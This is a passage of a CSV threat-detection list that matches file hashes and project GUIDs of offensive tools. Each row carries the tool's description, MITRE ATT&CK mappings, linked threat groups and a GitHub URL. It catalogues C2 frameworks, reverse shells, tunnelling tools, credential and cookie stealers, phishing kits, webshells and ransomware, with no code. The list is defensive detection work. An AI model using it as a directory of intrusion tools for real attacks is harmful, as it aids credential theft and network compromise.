is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24370" "*330ffb5abd7f035bc263a5f5938325aeb91a4d22e15ed1814d6a78098e00fb36*",".{0,1000}330ffb5abd7f035bc263a5f5938325aeb91a4d22e15ed1814d6a78098e00fb36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24372" "*331494b772e936769247a43746a6ac828257c145cb3e514e8682ceb5d58af06f*",".{0,1000}331494b772e936769247a43746a6ac828257c145cb3e514e8682ceb5d58af06f.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","24374" "*3318d1dd3fcab5f3e4ab3cc5b690a3f4*",".{0,1000}3318d1dd3fcab5f3e4ab3cc5b690a3f4.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","24375" "*331952cdf2781133eafa25e3115db3e9cfb2cbf9b208fbcb6a462eab2e314343*",".{0,1000}331952cdf2781133eafa25e3115db3e9cfb2cbf9b208fbcb6a462eab2e314343.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#filehash","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","24376" "*332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d*",".{0,1000}332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24377" "*33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd*",".{0,1000}33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24380" "*3338c8a4e14d314a4a3313dc67cb1e1f2274c8b30cc2cdf55586d7cdba2a6d68*",".{0,1000}3338c8a4e14d314a4a3313dc67cb1e1f2274c8b30cc2cdf55586d7cdba2a6d68.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24381" "*33418fd2e30db0c4c6ee6c62ded3b4707045e618939c2b772e0cee4efa7f3e67*",".{0,1000}33418fd2e30db0c4c6ee6c62ded3b4707045e618939c2b772e0cee4efa7f3e67.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24384" "*3342b13f536e40d34e2a0155667854ddd3904c193db870c7c759365530b2ae82*",".{0,1000}3342b13f536e40d34e2a0155667854ddd3904c193db870c7c759365530b2ae82.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24386" "*334a8657b76c88f5d7b6a2be78cc4e9e6c5ecaeea5a104cea5e6d0c4250674a7*",".{0,1000}334a8657b76c88f5d7b6a2be78cc4e9e6c5ecaeea5a104cea5e6d0c4250674a7.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","24387" "*33513a09abcccf0f96dec767ad33fd00b6086d00232be225457ab9bec12bd45b*",".{0,1000}33513a09abcccf0f96dec767ad33fd00b6086d00232be225457ab9bec12bd45b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24389" "*335203012039eb31e583004d1d19b67bb296425e600fc4e575eda033a655a107*",".{0,1000}335203012039eb31e583004d1d19b67bb296425e600fc4e575eda033a655a107.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy 
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24390" "*335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1*",".{0,1000}335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24391" "*3356e2d9bb13604bd6e11826ef39f433f6b847c7d3d172e33ceb7d9da779c079*",".{0,1000}3356e2d9bb13604bd6e11826ef39f433f6b847c7d3d172e33ceb7d9da779c079.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24392" "*33571B09-4E94-43CB-ABDC-0226D769E701*",".{0,1000}33571B09\-4E94\-43CB\-ABDC\-0226D769E701.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services 
(ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#GUIDproject","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","24393" "*335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a*",".{0,1000}335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24394" "*335d51e8af6d00637461087ad4531061213e38a8bb020796fd67d53b7b01a9c4*",".{0,1000}335d51e8af6d00637461087ad4531061213e38a8bb020796fd67d53b7b01a9c4.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","24396" "*335f1dcefb6d0e3e4a2e97d68d54d87cb53f6ba029a428a048752b19ecca71ad*",".{0,1000}335f1dcefb6d0e3e4a2e97d68d54d87cb53f6ba029a428a048752b19ecca71ad.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","24398" 
"*335ff83fa33730df73dca7bb504898b78823c065a7437807fb9a2ff52d5b14e8*",".{0,1000}335ff83fa33730df73dca7bb504898b78823c065a7437807fb9a2ff52d5b14e8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24399" "*3364dd7d78f44251e596a40b35adb6fcc5a38c1da2741f69e13f09cb721dcd47*",".{0,1000}3364dd7d78f44251e596a40b35adb6fcc5a38c1da2741f69e13f09cb721dcd47.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24401" "*3365bdc76c116ce83c56e7d2e4c7c046a6a82d24bb23982c46bdb6476c6807f6*",".{0,1000}3365bdc76c116ce83c56e7d2e4c7c046a6a82d24bb23982c46bdb6476c6807f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24402" "*336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c*",".{0,1000}336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24404" 
"*3379f86e6b7a13491a8aa668e567b7dfc532d79da5216fd50e3659f7ea9df372*",".{0,1000}3379f86e6b7a13491a8aa668e567b7dfc532d79da5216fd50e3659f7ea9df372.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24406" "*337cd6f66f324a1e30d9bae046f10577318da2126f3981dfff99c6def8799bd4*",".{0,1000}337cd6f66f324a1e30d9bae046f10577318da2126f3981dfff99c6def8799bd4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24407" "*337dcd762be6b0cd6566fd44bc161387d836557f78cc595804a2a04623a5f505*",".{0,1000}337dcd762be6b0cd6566fd44bc161387d836557f78cc595804a2a04623a5f505.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24408" "*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#GUIDproject","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","24409" 
"*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#GUIDproject","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","24410" "*3383dfa09bf9497b70b13bfc0baa3dfdef51d6689a04e25a3adc769f76b775ef*",".{0,1000}3383dfa09bf9497b70b13bfc0baa3dfdef51d6689a04e25a3adc769f76b775ef.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24411" "*33905c6c09d7bfd90a6afa48e1ba9bf6349439cb1b397f7981970631c11a4dfb*",".{0,1000}33905c6c09d7bfd90a6afa48e1ba9bf6349439cb1b397f7981970631c11a4dfb.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24414" "*339644dd4613c28f3d05677cf26f56c6196b4bd49e2ee32b1ec666113f1fd6b7*",".{0,1000}339644dd4613c28f3d05677cf26f56c6196b4bd49e2ee32b1ec666113f1fd6b7.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24415" "*3397fa7a9770b48fc268eae7a8f8f7f01a7f68c965727a35b85c9128fbe3b835*",".{0,1000}3397fa7a9770b48fc268eae7a8f8f7f01a7f68c965727a35b85c9128fbe3b835.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24416" "*339946aaf56d168682d5823ec417bfe5d5d7e9879b85a1d4672c75aab8a77c0e*",".{0,1000}339946aaf56d168682d5823ec417bfe5d5d7e9879b85a1d4672c75aab8a77c0e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24417" "*33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b*",".{0,1000}33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24418" "*33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017*",".{0,1000}33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","24419" "*33a8d6b2525e1a6f96b05cea34403292a78d8d5f6c58100c03d48c8c1e49c474*",".{0,1000}33a8d6b2525e1a6f96b05cea34403292a78d8d5f6c58100c03d48c8c1e49c474.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24420" "*33b38994e71d9317e92ce4c8062e8005e15751432f88b35e8536e851425d5adb*",".{0,1000}33b38994e71d9317e92ce4c8062e8005e15751432f88b35e8536e851425d5adb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information 
gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24424" "*33b54c9b555472d471ff2eb145156d7212e13ad4282b020527267ca42c2afafe*",".{0,1000}33b54c9b555472d471ff2eb145156d7212e13ad4282b020527267ca42c2afafe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","24425" "*33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61*",".{0,1000}33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24426" "*33bd8a0ee9aba1b5c63f44d993def62986b98ca01590bc1bf2638190b2dd5961*",".{0,1000}33bd8a0ee9aba1b5c63f44d993def62986b98ca01590bc1bf2638190b2dd5961.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","24428" "*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*",".{0,1000}33BF8AA2\-18DE\-4ED9\-9613\-A4118CBFC32A.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","#GUIDproject","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","24429" "*33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39*",".{0,1000}33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can 
also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24430" "*33c1c910095186228f4a1843ab48098179b8ef57d0b235cdd483da5438a4aa49*",".{0,1000}33c1c910095186228f4a1843ab48098179b8ef57d0b235cdd483da5438a4aa49.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","24431" "*33c6f02299b0000508619734f88c1c8bb0c8edf302efbd55c146e9a59aad4424*",".{0,1000}33c6f02299b0000508619734f88c1c8bb0c8edf302efbd55c146e9a59aad4424.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24432" "*33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2*",".{0,1000}33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24433" "*33ca24f0ff7df10eec6dc4e226f8ad5410cd475e1c24976cff824d6a09fe98e5*",".{0,1000}33ca24f0ff7df10eec6dc4e226f8ad5410cd475e1c24976cff824d6a09fe98e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. 
Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24435" "*33cc5cb674c4c4a7aa6a724b980e9e8f9d918f605ac892628da6ba6230423f3c*",".{0,1000}33cc5cb674c4c4a7aa6a724b980e9e8f9d918f605ac892628da6ba6230423f3c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24436" "*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24437" "*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24438" 
